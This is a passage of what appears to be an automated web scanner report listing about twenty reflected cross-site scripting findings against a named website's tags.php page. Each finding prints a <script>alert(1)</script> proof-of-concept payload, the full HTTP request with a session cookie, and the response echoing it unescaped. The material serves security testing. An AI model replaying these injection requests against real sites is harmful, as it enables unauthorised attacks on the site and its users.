Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpfa4c9<script>alert(1)</script>b81e8f86675&ltr=A was not found on this server.</p>
...[SNIP]...

2.4700. http://www.resellerbase.com/tags.php&ltr=A [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=A

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6765c<script>alert(1)</script>a8321ed6fc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=A?6765c<script>alert(1)</script>a8321ed6fc0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=A?6765c<script>alert(1)</script>a8321ed6fc0=1 was not found on this server.</p>
...[SNIP]...

2.4701. http://www.resellerbase.com/tags.php&ltr=B [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=B

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c815d<script>alert(1)</script>6593a311685 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpc815d<script>alert(1)</script>6593a311685&ltr=B HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpc815d<script>alert(1)</script>6593a311685&ltr=B was not found on this server.</p>
...[SNIP]...

2.4702. http://www.resellerbase.com/tags.php&ltr=B [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=B

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2dd95<script>alert(1)</script>ad1dd1f2b99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=B?2dd95<script>alert(1)</script>ad1dd1f2b99=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=B?2dd95<script>alert(1)</script>ad1dd1f2b99=1 was not found on this server.</p>
...[SNIP]...

2.4703. http://www.resellerbase.com/tags.php&ltr=C [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=C

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e637b<script>alert(1)</script>e2257fea742 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpe637b<script>alert(1)</script>e2257fea742&ltr=C HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpe637b<script>alert(1)</script>e2257fea742&ltr=C was not found on this server.</p>
...[SNIP]...

2.4704. http://www.resellerbase.com/tags.php&ltr=C [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=C

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 47e9b<script>alert(1)</script>cdff05ff1a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=C?47e9b<script>alert(1)</script>cdff05ff1a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=C?47e9b<script>alert(1)</script>cdff05ff1a7=1 was not found on this server.</p>
...[SNIP]...

2.4705. http://www.resellerbase.com/tags.php&ltr=D [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=D

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d135c<script>alert(1)</script>13428607a9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpd135c<script>alert(1)</script>13428607a9e&ltr=D HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpd135c<script>alert(1)</script>13428607a9e&ltr=D was not found on this server.</p>
...[SNIP]...

2.4706. http://www.resellerbase.com/tags.php&ltr=D [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=D

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f0ca2<script>alert(1)</script>ee1a4cc843 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=D?f0ca2<script>alert(1)</script>ee1a4cc843=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=D?f0ca2<script>alert(1)</script>ee1a4cc843=1 was not found on this server.</p>
...[SNIP]...

2.4707. http://www.resellerbase.com/tags.php&ltr=E [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=E

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ece3<script>alert(1)</script>23c9448c299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php5ece3<script>alert(1)</script>23c9448c299&ltr=E HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php5ece3<script>alert(1)</script>23c9448c299&ltr=E was not found on this server.</p>
...[SNIP]...

2.4708. http://www.resellerbase.com/tags.php&ltr=E [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c3461<script>alert(1)</script>18880d7933b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=E?c3461<script>alert(1)</script>18880d7933b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=E?c3461<script>alert(1)</script>18880d7933b=1 was not found on this server.</p>
...[SNIP]...

2.4709. http://www.resellerbase.com/tags.php&ltr=F [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=F

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04f8<script>alert(1)</script>c87622fc15b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa04f8<script>alert(1)</script>c87622fc15b&ltr=F HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa04f8<script>alert(1)</script>c87622fc15b&ltr=F was not found on this server.</p>
...[SNIP]...

2.4710. http://www.resellerbase.com/tags.php&ltr=F [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=F

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 70222<script>alert(1)</script>4177c7bd5a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=F?70222<script>alert(1)</script>4177c7bd5a7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=F?70222<script>alert(1)</script>4177c7bd5a7=1 was not found on this server.</p>
...[SNIP]...

2.4711. http://www.resellerbase.com/tags.php&ltr=G [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=G

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22f48<script>alert(1)</script>96b13bf45b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php22f48<script>alert(1)</script>96b13bf45b7&ltr=G HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php22f48<script>alert(1)</script>96b13bf45b7&ltr=G was not found on this server.</p>
...[SNIP]...

2.4712. http://www.resellerbase.com/tags.php&ltr=G [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=G

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2555a<script>alert(1)</script>f1ba0d137a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=G?2555a<script>alert(1)</script>f1ba0d137a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=G?2555a<script>alert(1)</script>f1ba0d137a=1 was not found on this server.</p>
...[SNIP]...

2.4713. http://www.resellerbase.com/tags.php&ltr=H [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=H

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9384<script>alert(1)</script>a3a51e579c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpa9384<script>alert(1)</script>a3a51e579c1&ltr=H HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpa9384<script>alert(1)</script>a3a51e579c1&ltr=H was not found on this server.</p>
...[SNIP]...

2.4714. http://www.resellerbase.com/tags.php&ltr=H [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=H

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 26a29<script>alert(1)</script>b7002d12091 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=H?26a29<script>alert(1)</script>b7002d12091=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=H?26a29<script>alert(1)</script>b7002d12091=1 was not found on this server.</p>
...[SNIP]...

2.4715. http://www.resellerbase.com/tags.php&ltr=I [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=I

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf25d<script>alert(1)</script>bb20fedc856 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.phpbf25d<script>alert(1)</script>bb20fedc856&ltr=I HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.phpbf25d<script>alert(1)</script>bb20fedc856&ltr=I was not found on this server.</p>
...[SNIP]...

2.4716. http://www.resellerbase.com/tags.php&ltr=I [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=I

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 897fe<script>alert(1)</script>6f32f9252d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=I?897fe<script>alert(1)</script>6f32f9252d4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=I?897fe<script>alert(1)</script>6f32f9252d4=1 was not found on this server.</p>
...[SNIP]...

2.4717. http://www.resellerbase.com/tags.php&ltr=J [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=J

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18be3<script>alert(1)</script>8bf3f141685 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php18be3<script>alert(1)</script>8bf3f141685&ltr=J HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php18be3<script>alert(1)</script>8bf3f141685&ltr=J was not found on this server.</p>
...[SNIP]...

2.4718. http://www.resellerbase.com/tags.php&ltr=J [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=J

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9346a<script>alert(1)</script>bb93ccfe4be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tags.php&ltr=J?9346a<script>alert(1)</script>bb93ccfe4be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tags.php
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tags.php&ltr=J?9346a<script>alert(1)</script>bb93ccfe4be=1 was not found on this server.</p>
...[SNIP]...

2.4719. http://www.resellerbase.com/tags.php&ltr=K [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tags.php&ltr=K

Issue detail

